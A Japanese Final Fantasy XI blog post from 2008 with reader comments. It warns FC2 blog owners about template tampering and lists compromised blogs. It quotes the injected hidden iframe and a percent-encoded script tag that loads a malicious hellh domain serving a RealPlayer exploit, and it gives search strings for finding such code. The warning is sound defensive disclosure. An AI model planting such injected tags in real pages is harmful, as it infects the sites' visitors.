忍者ブログ
一匹の見習い黒ミスラが、ペット狩りでLv75を目指すブログ。
2017 . 04
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • プロフィール
    Profile
    カウンター
    最新CM
    [11/01 時空を超えた通りすがり]
    [10/17 時空を超えた通りすがり]
    [10/16 時空を超えた通りすがり]
    [05/31 つかさ]
    [05/08 ペルタ]
    [04/28 シコウ]
    [04/24 名無しのペット狩り]
    [04/12 最近踊り上げ始めたタルっ子]
    [04/08 白猫]
    [04/06 はごろも]
    [04/01 Azul]
    [03/31 とんろぶ]
    [03/28 chai]
    [03/23 黒樽とっきー]
    [03/21 ふるふるオレンジ♪]
    カテゴリー
    ブログ内検索
    リンク
    アクセス解析
    ×

    [PR]上記の広告は3ヶ月以上新規記事投稿のないブログに表示されています。新しい記事を書く事で広告が消えます。

    ■□■□■□■□■ FC2ブログテンプレート改竄に関して □■□■□■□■□
    テンプレート改竄の件に関しては以下のエントリーを参照下さい。
    ウイルス検出について【報告】
    ウイルス検出について【情報追記】
    ウイルス検出について【罠再び!】
    また3/14〜3/15に第七猫の名を語り、踊り子AF関係の罠コメ
    各ブログ様で見られているようです。以下のコメントは罠ですので見つけ次第
    削除を宜しくお願い致します(´;ω;`)ブワッ

    >踊り子AFクエのアイテムですが、新エリアの過去オズで詩人ヤグ4匹くらいで
    >2個ドロップ(トレハン+4あり・忍シ暗白白)しました。
    >運がよかっただけかもですが参考までに書いておきます。


    ↑この内容で第七猫の名での書き込みです。
    アドレスには絶対にアクセスなさらないようにお願い申し上げます。
    ■□■□■□■□■□■□■□■□■□■□■□■□■□■□■□■□■□■

    こんにちわ、第七猫です!(´・ω・`)

    不本意ながらまたこのエントリーでの記事が…まだ発覚してあまり時間が経っていませんが
    新たな手口での罠が見られたので、皆さん至急ご一読と心当たりのある方は
    PCのウイルススキャン実施をお勧め致します。

    ■どこに罠が…

    −−−−−−−−−−−− 概要 −−−−−−−−−−−−−−
    ?ペコろぐ 様(Javaスクリプト発見、要注意→現在修正し公開
    ?ヴァナモンBlog 様(Javaスクリプト発見、要注意→現在修正し公開
    ?FF11ある黒魔導士の軌跡 様(インラインフレーム発見、要注意→現在修正し公開
    ?FF11初心者の館 様(Javaスクリプト発見、要注意
    ?Lostfr【誰か】かまって【くれませんか?】 様
     (Javaスクリプト発見、要注意→現在修正し公開
    −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−

    ?今回第七猫も確認できたのはサルベージ関係で有名なFC2ブログ様。
      →ペコろぐさん(ttp://pekoe1001.blog100.fc2.com/)

    現在(3/22昼過ぎ)、非公開モードになっておりますがいつから罠が張られていたかは
    現時点で不明です。特に週末ですので、見に行かれた方はウイルススキャンを掛けた方が
    宜しいかと思われます。

    カスペルスキーでの検出報告がありますので、こちらでスキャンされるのが良いかと。
       ↓
    カスペルスキーオンラインスキャン

    〜3/22 23:00頃追記〜

    なんと…ここにも同様の罠が…(´・ω・`)
    グーグル先生に問い合わせただけなのに…

    ?ヴァナモンBlog 様(ttp://vanamon.blog53.fc2.com/)

    ヴァナモン

    ちょっ…おまっ…((( ;゚Д゚)))ガクガクブルブル

    何その赤信号…たまたまグー先生から行こうとしたけど、直接飛べる人も多いんじゃ…

    大変失礼ながら、ヴァナモンさんのhtmlソースをDLし早速チェックしてみた結果…

    ソース

    あったよ…なんだこれは…同じようなエンコードされたアドレスにJavaスクリプト
    Σ(゚Д゚;≡;゚д゚)?

    グー先生からだと、ちゃんと警告出ます直接飛べる人は注意してください!

    〜3/23 2:30頃〜

    こちらはインラインフレームの罠…もうね…いい加減に…(#^ω^)

    ?FF11 ある黒魔導士の軌跡 様(ttp://volnutblog65。fc2。com/)

    以前からのインラインフレーム+今回のHellhへの誘導というコンボが炸裂…
    大変失礼ながらソースを拝見、そしてチェック…

    ある黒

    テンプレの一番ラストに、エンコードされたアドレスへのインラインフレーム発見…
    これは…アウアウ

    しかもヤラシイ事に、Dr.WEBでチェックを掛けたんですが…
    エンコードしてあるせいか、Hellhは検出する物の緑表示(クリーン)が…(´;ω;`)

    ある黒チェック

    こうなってしまっては直接飛び先のソースをDLして、直接自分でチェックするしか…(泣

    〜3/23 15:00頃〜

    ?こちらも追加です… 
    FF11 初心者の館 様(ttp://ff11afian.blog113.fc2.com/)

    毎度の事ながら、こちらも失礼してソースを拝見…

    FF11初心者

    もうね…危険を察知したらウイルス感染以上のスピードで、情報を
    開示していくしか今とのコトロ取る手段が無い!!ヽ(TДT)ノ

    ちっくしょー!(´;ω;`)ブワッ

    ?Lostfr【誰か】かまって【くれませんか?】 様

    当ブログにコメント頂きましたロストさん管理のブログです。
    3/20に見慣れぬJavaスクリプトからエンコードされた状態へのアドレスに飛ぶ罠が…

    既に修正済みでソースは確認できておりませんが、被害が広がる一方ですね(´・ω・`)

    ■どんな罠?

    前回ご報告したインラインフレームタグ

    <iframe src=http://##### width=0 height=0>< /iframe>

    こちらへの対策が取られ出しているので、テンプレ検索に掛からないように

    <script src="http://#####></script>

    というJavaスクリプトを利用したアドレスへの誘導が見られた模様です!

    このJavaスクリプトから別のアドレスへ飛び、さらにその先で0×0のインラインフレーム等を
    使い色々飛び回るようになっているみたいです。

    最終的に

    マルウェア 「Exploit.JS.RealPlr.db」

    を検出する模様(by:カスペルスキー)

    名前から察すると前回同様、RealPlayerの脆弱性を突くウイルスに見られそうですが…

    ちなみに罠の内容をもう少し書きますと…

    <script src="hxxp//%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73">
    </script>


    今回追加(?)された怪しいスクリプトは上記。

    この「%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73」って
    訳の分からないアドレスが指定されていますが、これをデコードすると…(デコードはこちら

    → www■hellh■net/w■js

    また”hellh■net”か!!Σ(゚д゚)

    これは戦士スキーさんのところに仕掛けられた2個目の罠と同じ物!!

    もうね…(´・ω・`)

    ■FC2管理人の皆様へ

    至急、ご自分のブログのテンプレを確認するようにお願いいたします。

    ? <iframe
    ? <script


    (いずれも”<”は小文字で)

    上記二つでの検索をお願いします!!?は前回までと同様のインラインフレーム
    ?はJavaスクリプトを仕込んだ今回の罠です!

    しかしJavaスクリプトは、アクセス解析やTBP等の別アプリにも使用しております。
    身に覚えの無い物を選定する必要があります(・∀・)b

    ちなみに当ブログのソースを開き、”<script src”で検索を掛けてみますと…

    javaの部分

    このように、アクセス解析の部分にJavaスクリプトを使用しております。
    あとはプロフィールの部分と、ブログ内検索の小窓の部分でしょうか。
    3箇所いずれも異常は無い事を確認しております。

    このJavaはというと、このようにアクセスカウンター上にポインターを置くと…

    アクセス解析

    このように、今日のアクセス状況ならびに数日前までのアクセス状況が見られるという機能。
    Java機能を止めている状態ではポインターを置いても反応は無いです。

    他には色々設定できるブログパーツでJavaスクリプトが使われている場合がありますが
    それは各ブログ主様でご確認頂くしかないかなぁ…(´・ω・`)

    どうしても身に覚えが無いアドレスだったり、怪しくデコードされた物だった場合は
    中身をソースチェッカー等でご確認されるのが良いかと思われます。

    ただソースチェッカーだと、スクリプトの指定先を完全にチェックできない恐れがあります。
    特に今回の様にエンコードされた意味不明なアドレス等…
    手動でデコードし、その先を直接チェックしなければ正確にわからないっぽいです。

    ■FC2からの回答

    しつこくFC2に状況説明や今後の対応策をメールしています(汗
    何も反応が無いので「分からないなら、分からないなりに返信をクレ」と要望した所

    3/18に一報が入っております。ただ内容は

    >お問い合わせいただいた件ですが、現在調査中でございますので
    >もうしばらくお待ちいただきますでしょうか。

    という物。うーん、まぁ仕方ないが、いつまでかかるのやら…

    一応起きてる現象に対して、アクションが行われているようには読み取れますが…
    まぁいつまでに…という事に関してはやはり言い出しにくいでしょうね(´・ω・`)

    正直、ここまでブログテンプレ改竄が多く見られると管理者云々では無く
    システム的なバグや抜け道があるような気がしちゃいますね…恐ろしい…

    ■取り合えず…

    取り合えず現時点で分かっている事を端折って書きました。(3/22 15:30現在)
    解析人さん、コメントありがとうございました!丁度同じスレ見ててワロタ(笑

    ただ出先だったもので、対応が遅れましたが一旦エントリーを上げておきます。
    特にサルベージ関係というホットな注目のブログ様なのでフレや仲間がいた場合は、
    情報を早めに伝えてあげるといいです(・∀・)b

    追記:解析人さんのブログ

    → ilion.blog47.fc2.com

    詳細なウイルスの解析情報を頂けた、解析人さんのブログです。
    今回の罠の専門的且つ詳細な検証等が見られます。が以下注意。

    >内容の正しさや永続性は保障できません
    >(頻繁に編集します)。また、あくまで(仮)なのでそのうち消えるかもしれません。
    >ついでに本来は「本当に簡単にハックされるの?」と試しに(デコイとして)
    >罠ウェルカムの精神で作ってみただけなので安全性の保障もできかねます。


    との事です(・∀・)
    PR
    ■ この記事にコメントする
    お名前
    タイトル
    文字色
    URL
    コメント
    パスワード
    Vodafone絵文字 i-mode絵文字 Ezweb絵文字
    ■ コメント一覧
    無題
    うわ〜!
    手を変え品を変え、よくやりますね。(T_T)
    もう、個人で管理できるレベルではないかも・・・。

    いつも、情報を教えていただいて、ありがとうございます。
    早速、注意喚起の記事、書いてきますね。
    izumiさん / 2008/03/22(Sat) /
    無題
    こんにちは。
    ドコカデ見覚えのある文字列・・
    デコードするまえになんだかわかっちゃいました(´・ω・`)

    個人的には<iframe>騒動のときからスクリプトによる置き換えもありえると警戒していたので
    現時点でうちのブログには問題はないようです。

    テンプレだけじゃなくてそのうちプラグインの方も弄ってきそうで
    ソースを表示して全域にチェックを入れていますが
    スクリプト物は結構あるのでめんどくさいんですよねぇ(´・ω・`)

    ここに来るといつも面白いヤマヴィコとかドゥクケシとかマテゴブーとかがあって何をしにきたか忘れてしまうのですが
    2回目の改竄時点ではリアルプレイヤーは削除してあったことをご報告しておきます。
    まぁ、リアルプレイヤーはパス抜きの方に使うのでしょうから
    ブログのテンプレが改竄されたこととはあまり関係なさそうですね(・ω・`)

    それにしても1日のアクセス5000ってオバケっ
    面白すぎるからしょうがないですね・・
    なんでれべるあっぽ直前で親リンクさせますかっ
    ペット狩りに毎日毎日あれだけのドラマがあって、さらにソレを面白く読ませる技があって
    もう、コノヤロウ褒め殺しの刑だコリャーヽ(`Д´)ノ
    R-typeさん / 2008/03/22(Sat) / URL
    再びコメントさせて頂きます<(_ _)>
    えー、残念なお知らせですが…。
    こちらの記事を読ませていただく前なのですが、
    自ブログのテンプレ確認いたしましたところ、
    ブログパーツ等ではない、不明なアドレスへといざなうJavaスクリプトを発見しておりました。
    20日昼ごろ発見、調べたら中国につながるようでしたので黒と判断。
    即削除はしましたが、いつからあったのかは不明。
    ちなみに当方、RealPlayerはインスコしておりませぬ(´・ω・`)
    FF11の垢ハックが流行りだしたころに削除済みなのです。

    ・RealPlayerがなくても書き換えられるという事実。
    ・こちらのブログ様のような有名なブログでなく、私のような貧弱なブログも書き換えられるという事実。
    ・3日に1回ペースのパス変更に効果はかったという事実。

    パス変更がされないことから、管理画面以外からなんとか書きかえれる手口があるのでは?
    とFC2様にメールはしておりますが、「調査中」
    としか返ってこない現状。
    毎日テンプレ眺める日々です…(´ー`)y━~~

    業者って頭いいよな…
    まともなことして充分稼げると思うんだがっ!!w
    Dr.web が大活躍ヽ(´ー`)ノ
    ロストさん / 2008/03/22(Sat) / URL
    無題
    To * 2008.03.22 17

    こんにちわ!第七猫です!( ^ω^)

    悶絶なる腹筋鍛えブログへようこそ(爆
    ハンネ入ってないけどたぶん2度目のミス、間違いなくきっとそう(笑
    いやーなんというか…えらい被害が拡大してきて…
    私も自分のブログのみならず、何かしらの不安がありますよね(´・ω・`)

    ちょっと酷い状況ですよね…(´;ω;`)
    これだけ被害が拡大すれば、もうハッキリ言ってシステム側への
    直接の改竄手段があるとしか…(汗
    これって管理人で自衛できる範囲なのでしょうかねぇ…
    取り合えずフレにはブログ見るなら携帯を勧めるべきかも(笑
    良い回避策だと思いますね\(^-^)/

    To izumiさん

    こんにちわ!第七猫です!( ^ω^)

    なんというか…もう酷いの一言ですね…(´・ω・`)
    個人管理できるってレベルじゃねーぞって感じ!
    こんなにサクサク罠が増えていくなんて、未だに不安と
    恐怖が残りますよね…・゚・(ノД`)・゚・

    取り合えず現時点で出来る事は、情報を早めに出す事じゃないかなぁ…
    被害報告が少しでも減るように、情報を〜!
    犯人のバーヤバーヤ!(´;ω;`)ブワッ

    To R-typeさん

    こんにちわ!第七猫です!( ^ω^)

    いやーもうなんですか?次はなんとなく予想のつくスクリプト…
    でもこれって自由度の高いFC2だと、色んなブログパーツに
    付いてるので、管理人しか…って所が多いんですよね(汗
    最終的にはアドレスでチェックかなぁ?
    それにしてもhellhの情報、R-typeさんの所で見てて助かりました…

    Javaスクリプトorインラインフレーム + hellh
    という組み合わせの罠が横行しているので、マズ間違いなく
    同一犯でしょうねぇ…しかもこれだけ多くのブログが改竄されて
    いるとすると、一番嫌な事が思い描かれますね(´;ω;`)ブワッ
    あ、親リンクはなんというか…実力ですよ、じつry(ry
    く…悔しいぃ…ビクンビクン!(爆

    To * 2008.03.22 21

    こんにちわ!第七猫です!( ^ω^)

    返事遅れて申し訳ないです。取り合えずご指摘の内容には
    即効修正させてもらいました(笑
    確かに次に続く1文が、scr以外にも掛かりますしね〜。
    しかし今回の罠は、色々飛び回る為チェッカーやDr.WEBでも
    一発でNG判定出ないのが…(´・ω・`)

    なんか日毎に被害ブログが次々上がってて、もうね…
    管理者【どうすればいいですか?】って感じですよ\(^-^)/
    また何かあれば情報をお願いします!可能な限り早めに
    記事にしたいと思います〜(・∀・)b

    To ロストさん

    こんにちわ!第七猫です!( ^ω^)ノ

    ええっと…【マジですか?】Σ(゚д゚)
    ちなみに今回のように、エンコードされたアドレスですか?
    それともデコード状態(普通にアドレスが分かる状態)の罠でしょうか?
    しかもスクリプトなら尚更最近の罠ですよね…?

    しかも3日に1回パス変更でもか…
    某青魔導士さんのコメントにもあったように、PC完全分離し
    パス入力時には起動すらしないで万全の対策と思われる状態でも
    2度目の改竄ですからねぇ…(´・ω・`)
    もうなんというか…どうすりゃいいものか…
    あー、ちなみに本文にも書きましたが、Dr.WEBで緑状態でも
    一応内容は確認した方がよさそうです(´;ω;`)ブワッ
    hellh入ってたら要注意…というかNGだと思われます!
    気をつけてくださいー!(・∀・)b
    第七猫さん / 2008/03/23(Sun) / URL
    無題
    リンクチェッカー抜けてきましたねぇ。McAfeeでも同様のサービスがあります。
    McAfee SiteAdvisor
    www.siteadvisor.com
    サイトのつくりがとてもとても安っぽいというかインチキくさい(笑)ですが、
    とりあえず本物のMcAfeeです。この手のサービスも完璧ではありませんので、
    ソースチェッカーのちょっと強力な奴、という程度に認識しておいたほうがいいでしょう。

    使う脆弱性についてRealPlayerをイチオシにしてきましたが、
    WindowsUpdateで阻止できる脆弱性も使っています(現時点でMS06-014、MS07-017)。
    WindowsUpdateしていない(SP4にしていない2000とかSP2にしていないXPとか
    不正コピーとか)のは論外なので特に触れませんでした。

    某スレでばれた(笑)ので参考までにどうぞ。
    ilion.blog47.fc2.com
    内容はいくらでもコピペしてかまいませんが、内容の正しさや永続性は保障できません
    (頻繁に編集します)。また、あくまで(仮)なのでそのうち消えるかもしれません。
    ついでに本来は「本当に簡単にハックされるの?」と試しに(デコイとして)
    罠ウェルカムの精神で作ってみただけなので安全性の保障もできかねます。
    解析人さん / 2008/03/23(Sun) /
    無題
    え〜と名無し猫ですwww

    なぜバレたのかしらw
    しかも何故か非公開になってるし(・ω・)

    もうこれはあれですね…ハンネいらないヽ(゜▽、゜)ノ


    垢ハックはホント酷いですねぇ。
    パス変えまくっても駄目とか…FC2自体に致命的な致命傷が存在しているのかねぇ。
    十六夜猫さん / 2008/03/23(Sun) /
    20日発見のJavaスクリプト
    20日に発見したJavaスクリプトは、デコード状態でした。
    今のエンコードされた状態に変化する前のものではないかと思われます('◇')ゞ
    FC2にメール攻撃を仕掛けると共に(笑)、
    自分が使っているウイルスバスターさんへもメールで、「なんとかならんのか?」と問いかけております。
    FC2サーバーさんがどういったセキュリティーなのかがわからないけども、
    双方の返答待って、また来ます!w
    早急な情報共有しかないですよね、今のとこ…(´・ω・`)
    ロストさん / 2008/03/23(Sun) / URL
    無題
    うわー!また新たな罠がっ!!
    iframeにscriptを使うとは・・・手が込んでるというか、閲覧者にはもう防ぎようがないというか。。。
    怖いですねぇ〜o(>_&lt;)o
    毎日テンプレチェックしてますが、fc2の方でどうにか対応できないものですかね・・・もうこのままだとfc2から離脱するしかない?!
    たまにょんさん / 2008/03/24(Mon) /
    コメントありがとうございます!
    To 解析人さん

    こんにちわ!第七猫です!( ^ω^)

    晒すなよ;でフイタ(笑
    どうやら今回の罠で、2度目のアクセスからはFC2へ飛ぶように
    なっているみたいで…もしかしてDr.WEBも2度目のチェックだと
    グリーン表示になるのかな?なんて疑いが。
    一度目はブラック表示で怪しい扱いだった記憶が…(汗

    (仮)拝見させてもらっています(笑
    時既に時間切れ!( ^ω^)
    どちらかというとハード側の人間なので、ソフトはイマイチ
    ですが、必死にどんなモノか理解しようと読んでいます(爆
    一応本文にアドレス追記させてもらいますが、罠ウェルカムという事から
    あくまで参考という形で。すいませんです(´・ω・`)
    それにしても被害が広がるばかりで…もうね(;´д`)ゞ

    To 十六夜猫さん

    こんにちわ!第七猫です!( ^ω^)

    だってほら!2度目だし(笑
    (・ω・)←これが十六夜猫さんのイメージが強い第七猫ですが
    何か問題でも?(^ω^)?
    うんうん、ここまで被害が拡大すると管理者のパス抜き等より
    システム的な穴があるんじゃないかと、恐ろしい予想が…

    最近普通のエントリー以上に、罠系のエントリーが多くて寂しい(´;ω;`)ブワッ
    おれっち侍37になったんやけどぉ〜?
    素直に喜べない!喜び難い!\(^o^)/

    To ロストさん

    こんにちわ!第七猫です!( ^ω^)

    そ…そうですか〜。一応ですが本文に追記させてもらいました…
    もう色んなところで罠が多く見られて、気軽にブログ閲覧も
    厳しいですよねぇ…(´・ω・`)
    FC2への問い合わせも多数行ってるはず(笑

    もしまた何か情報あったら教えてください!!
    FC2から「現在調査中」との回答はありましたが
    コレ上の回答が来る見込みが少ないので…
    管理者【どうすればいいですか?】(´;ω;`)ブワッ

    To たまにょんさん

    こんにちわ!第七猫です!( ^ω^)

    ええ、閲覧者はもちろん管理者にでさえ防ぎようが無いという
    恐ろしい状態ですね((((゚Д゚;))))ガクガクプルプル
    JavaはOFF、インラインフレームもOFFして且つRealPlayerも
    アンインスコしましたが…肝心のブログ改竄が防げないのでは
    どうしようもないですねぇ(´・ω・`)

    某青魔さんもどうやら別ブログへの移転をされるみたいですし
    効果の程は分かりませんが、それも策の一つですね…
    FC2へのお引越し機能が追加されているみたいですが
    FC2からのお引越し機能はまだでしょうか(苦笑
    ってか、笑えNEEE!Σ( ̄ロ ̄)
    第七猫さん / 2008/03/24(Mon) / URL
    ■ この記事のトラックバック
    この記事にトラックバックする:
    侍上げ【まとめ】 HOME 侍上げ【36〜37】
    Copyright © FF11 ペット狩り黒猫奮闘記 All Rights Reserved
    Powered by ニンジャブログ  Designed by ピンキー・ローン・ピッグ
    忍者ブログ / [PR]